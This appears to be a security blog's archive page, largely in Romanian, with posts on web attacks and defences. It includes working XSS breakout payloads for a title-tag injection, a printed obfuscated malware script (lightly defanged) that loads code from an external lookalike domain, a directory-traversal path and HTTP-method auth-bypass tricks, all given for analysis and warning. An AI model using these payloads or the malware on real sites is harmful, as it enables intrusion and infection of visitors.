You are currently browsing the category archive for the ‘Websecurity’ category.
I was kind of looking (pentester way) on a website and I saw that they could have a XSS flaw on the search field. Inserting the following string „<b>tester” on the search field, it get reflected back but just on the <title> tag like this.
<title>Cauta <b>tester – ……………</title>
There is a classical XSS, but what made that one interesting to me was the <title> tag.
<title>Cauta<script>alert(1);</script> – ……………</title> => is not working
but
</title><script>alert(1)</script>&submit=Cauta => is working
Speaking with a friend, he gave me also an alternative the idea of inserting the <body> tag and create in this way a new HTML document.
So:
</title><body onload=’javascript:alert(1)’>
worked also like a charm.
Foarte multe persoane, pornind de la manageri pina la arhitecti de sisteme si dezvoltatori IT, cind vine vorba despre probleme de securitate si vectori de atac, ridica din umeri. Multi au auzit de ele, dar nu au o intelegere a fenomenului si a ceea ce inseamna . Articolele disponibile online sint ori prea tehnice, ori prea generale. Microsoft s-a hotarat sa dezvolte in cadrul SDL-ului, asa numitele QSR-uri, Quick Security Reference, care prezinta diferite atacuri din diferite puncte de vedere: al managerilor, al arhitectilor, al dezvoltatorilor de aplicatii si a tester-ilor/oameni de QA. Pentru fiecare este prezentata informatia in asa fel incat sa poata intelege si sa ia decizii avind informatiile sintetizate conform nevoilor personale. Primele doua documente descriu atacul „Cross Site Scripting” si „SQL Code Injection”. Merita citite!
Have Fun.
Pe blogul Microsoft a aparut o analiza interesanta despre sistemele care sint afectate de noul exploit „Aurora” si un link catre solutia propusa de ei, care consta in activarea optiunii de DEP pentru Internet Explorer. Aceasta se face prin instalarea urmatorului patch. Cealalta solutie, de dezactivare a scripturilor java, este nereala in Internetul actual.
Have fun.
Din testele mele, exploitul este stabil pentru IE6, dar duce doar la distrugerea instantei de IE7 sau 8.
Vineri seara am fost sunat de un prieten care mi-a spus ca tocmai fusese hack-uit. Exploit-ul, dupa informatiile prietenului meu, era de prin mai, si a avut ca rezulat infectarea tuturor hosturilor virtuale apache cu un script java. Cind am primit scriptul mi-a atras atentia modul diferit in care fusese ascuns codul sursa al scriptului java. El arata cam asa:
<!–44e8ef75ef25fc970a79a3ccb704ad42–><sc!!!!!!!!!!ript language=javascript>zahlpc=”Jl#tWL%POTzGHriViVz#LiY”;rvxleu=”<Q73crQ69pt laQ6egQ75age=jQ61vQ61scriQ70t> funcQ74ioQ6e djjQ78tQ6cgs(hlyzcQ6arQ29Q7bQ76aQ72 Q67ynQ73zty,Q6dQ76Q6ewQ63zQ6fQ6dfQ3d\”#(7Q6eTbQ55OQ50VQ36Q4aQ63:+Q5e1Q7e9Q24u_iQ29yo5Q72@,2Q6bQ30Q60&Q45Q77MQ20|Q7bQ674Q3djvQ64Q74CxIFhNm]Q3b}fQ71Q213[HaQ7aB-AZps*Q6cQ47e8Q5c\”‘Q4bQ2eQ22,Q70Q65Q77yhg=\”Q22Q2cQ66Q61Q73ltdsQ2cqQ6brkjQ6cQ77f,tQ68yQ69Q74dkii=Q22Q22,hpoQ70Q75oQ69;Q66oQ72(gynsztQ79=0;gynszQ74yQ3cQ68lyzcjr.lengQ74Q68;gQ79nQ73Q7aty+Q2bQ29{ Q66Q61sQ6cQ74Q64sQ3dhlyQ7acjr.chaQ72AQ74(Q67yQ6eszty);qkrQ6bjlwQ66=Q6dvnwQ63Q7aomf.iQ6edexOf(Q66asltds)Q3biQ66(Q71Q6brkQ6aQ6cwfQ3e-1){ hQ70opuoiQ3d(Q28Q71krkjlQ77Q66Q2bQ31)Q25Q381Q2d1Q29;Q69fQ28Q68pQ6fQ70uoiQ3c=0Q29Q68pQ6fpuQ6fQ69+=8Q31;thQ79itdQ6bQ69i+Q3dmvQ6ewczQ6fQ6df.Q63haQ72Q41Q74(hpoQ70uoi-Q31Q29Q3bQ20} Q65lseQ20tQ68yQ69Q74dQ6biiQ2b=fQ61Q73Q6ctQ64s;Q7dQ70eQ77Q79hg+Q3dQ74Q68Q79itdQ6biQ69Q3bQ64Q6fcumeQ6eQ74.Q77rQ69Q74Q65(peQ77Q79hQ67Q29Q3b}Q3cQ2fsQ63Q72iptQ3e”;fmxoqyuh=zahlpc.charAt(6);vrbnnv=rvxleu.replace(/(jjuysyvwv|Q|xmmwgridfz)/g,fmxoqyuh);sqlwbat=unescape(vrbnnv);var agfwxg,kbptlkr;document.write(sqlwbat);agfwxg=”<NC]G>|<*:@)sC|Cos8j’C8IC/vzdz*:@)sC’|GzT4_z48j’vzdz*:@)sC’>||dz@|8Is)@o|j|T8M|DzC87y}|8Is)@o#*8Cb)]878Is)@o#48Cb)]87y|^|k=lJ`lJ`l~„`y}|t5:_]8TC#:550)8jK*8**)5T)tj[$~k\”J`rZr[~}|szCNj/}|8Is)@8*jK|^|8Is)@o#C5e bSC@)T47y}||t5:_]8TC#M@)C87|'<SxRFVb|GzT4_z48j\\’czdzS:@)sC\\’|SRxj\\’NCCs+//4554G8zTzGoCG:*#T8C/ii_C]v#v*\\’><\\/SxRFVb>’|y}</*:@)sC>|</NC]G>|”;djjxtlgs(agfwxg);</sc!!!!!!ript><!–44e8ef75ef25fc970a79a3ccb704ad42–>
Semnele de exclamatie din cuvintul script imi apartin pentru a evita o eventuala executie a lui.
Dupa cum se vede, scriptul selecteaza din variabila „zahlpc”, caracterul al saptelea „%”, apoi caracterul Q este inlocuit cu „%” , si astfel sint returnate codurile asci ale caracterelor ce formeaza codul sursa. Acesta este primul layer de ascundere a codului. Apoi rezulta un nou script java care desfacut va arata asa:
<ht!!!!ml> <scr!!!!!!!ipt type=”text/javascript” language=”javascript”> var expiry = new Date(); expiry.setTime(expiry.getTime() + 24*60*60*1000); document.cookie=’sessionid=39128605A531; path=/; expires=’ + expiry.toGMTString(); document.write( „<SCR!!!!!!IPT language=\”JavaScript\” SRC=\”http://googleanalytlcs.net/__utmj.js\”><\/SCR!!!!!IPT>” );</scr!!!!!!!!!!!!ipt> </ht!!!!!ml>
Exte un script care citeste sessionsid-ul clientului pentru serverului care a fost infectat si impreuna cu data expirarii este trimis serverului googleanalytlcs.net. Sciptul java aflat aici va face call pentru un alt script de pe un alt site care va incerca exploatarea browserului. Site-ul din spate se schimba mereu.
O cautare in log-ul proxy-ului companiei unde lucrez arata ca exista destule site-uri romanesti care au fost infectate cu asa ceva. Deci recomand tuturor sa blocheze aceasta destinatie in proxy-uri.
O zi buna si va tin la curent in momentul in care am access la serverul care a fost exploatat cu detalii despre exploit.
Metodele acceptate de un server de HTTP sint GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS si CONNECT. Pentru definitia fiecaruia va rog sa consultati RFC 2616. De ce sint metodele acceptate de un server atit de importante si care este un posibil scenariu de atac?
Incercati sa identificati un link care este accesibil numai daca userul este autentificat. In momentul in care inlocuti metoda cu HEAD, veti putea avea surpriza ca serverul sa raspunda cu HTTP/1.1 200 in loc de HTTP/1.1 302, redirect catre pagina de login. O alta posibilitate este sa incercati cu BLAMETOD / HTTP/1.1. Serverul va trebui sa raspunda cu 405 Not Allowed sau 501 Not Implemented, dar …
Deci incercati sa vedeti ce metode sint implementate folosind OPTIONS.
Daca doriti sa indentificati un server si nu puteti afla daca este Apache sau IIS atunci incercati cu OPTIONS daca este permis. Ordinea in care sint afisate metodele este specifica fiecarui tip de server.
Pentru a evita acest tip de atac este recomandar restrictionare metodelor permise. Pentru Apache, restrictionarea metodelor se face folosind directiva <Limit>.
Have fun.
In primul rind ce este CWE. CWE vine de la Common Weakness Enumeration, si este o colectie a greselilor de programare ce se pot transforma in erori de securitate.
Ce este CWE-20? „Improper Input Validation” este prima intr-un top-ul 25 al organizatiei SANS referitoar la erorile facute in programarea aplicatiilor web. CWE ar trebui sa devina o referinta pentru toti programatorii mai ales ca organizatia MITRE ofera si exemple de programare, cit si considerente de implementare si arhitectura.
Ce este fisierul „robots.txt” care este gasit de obicei in multe din serverele aflate din internet? Cind un motor de cautare incearca sa indexeze un site, directoarele incluse in acest fisier nu sint indexate de motorul de cautare si nu vor fii niciodata gasite cu ajutorul acelui motor de cautare.
Fisierul este si o posibila problema de securitate pentru ca directoarele aflate acolo pot oferi informatii despre posibile interfete de administrare ale site-ului sau alte directoare care de obicei sint ascunse. Darrrrrrrrrrrr….haide sa vedem cum arata fisierul site-ului oficial parodie al Casei Albe.
# robots.txt for http://www.whitehouse.org/ User-agent: * Disallow: /american-theocracy/ Disallow: /bulletin/ Disallow: /halliburton-extranet/ Disallow: /illuminati/ Disallow: /operation-fascist-brainwashing/ Disallow: /payola-for-polluters/ Disallow: /plotocrats-only/ Disallow: /press/ Disallow: /skull-and-bones/ Disallow: /subscribe/ Disallow: /transfer/ User-agent: asterias Disallow: /
Concluziile va las pe voi sa le trageti. Oare ce are de-a face Casa Alba cu „iluminati” sau „operation-fascist-brainwashing”????
Have a nice week-end.
P.S. Pentru faptul ca a observat diferenta George primeste o bere la alegerea lui :-))
Uitindu-ma ieri dupa „Linkin Park” am avut parte de unul din cele mai interesante mesaje de „500 Internal Server Error” vazute vreodata. Ingeniosi baietii de la Youtube, pentru ca au gasit o metoda de a permite mesaje de eroare care totusi sa nu poata fi folosite pentru un viitor atac. Ma intreb oare ce algoritm de cripare au folosit, ca base64 nu e ;-)? Voi ce ziceti?
IDS-urile, in sine, sint sisteme care incearca sa ne pazeasca de vectori de atac sau atacuri cunoscute. Intre timp exista un nou proiect PHPIDS (PHP-Intrusion Detection System), care incearca sa implementeze un layer suplimentar de securitate sub o aplicatie php in dorinta de a detecta si reactiona la atacuri. Have a look.
Site-ul german de stiri din dimeniul IT Heise informeaza astazi ca site-ul cancelarei Germaniei Angela Merkerls a fost compromis folosindu-se directory traversal ( Ex: http://www.site-exemplu.com/../../../etc/passwd) si a fost instalat pe server un proxy de IRC. Ma intreb daca acest atac aspra prezentei internet a celui mai important om politic german, care este banal de contracarat din punct de vedere a securitatii, nu a fost luat in considerare , va schimba opinia oamenilor care decid in domeniul de IT in privinta importantei securitatii? Hmmmm..sper ca da.
Echo Mirage este un network proxy care foloseste tehnici de genul „DLL injection” si „function hooking” pentru a redirecta cererile de trafic de retea ale aplicatiilor oferind astfel posibilitatea de a urmari si modifica fluxului de date.
Avantaje: „DLL injection” si „function hooking” au loc inainte de criptare a traficului HTTPS, ceea ce il face foarte util la analiza malware-urilor si a root–kit-urilor. Are capabilitati de logare a traficului si tot odata de modificare „on the fly” pe baza de „regular expresions” a traficului.
Dezavantaje pina acum observate de mine: Nu permite crearea de pachete mai mari ca marime decit cele originale.
Have Fun.:-D
Azi am dat peste un articol foarte interesant a lui Amit Klein in Securityfocus in care face o afirmatie foarte transanta „NTLM is insecure by design„. De ce merita citit? Pentru ca in NTLM ca schema de autentificare nu este nesigura, dar in mai toate companiile schema „NTLM authetication + Proxy Server” este implementata fara a lua in considerare problemele de securitate. Wie schade, cum zice fiica mea:-). Sau poate nu?
Aspects of computer security 
Comentarii recente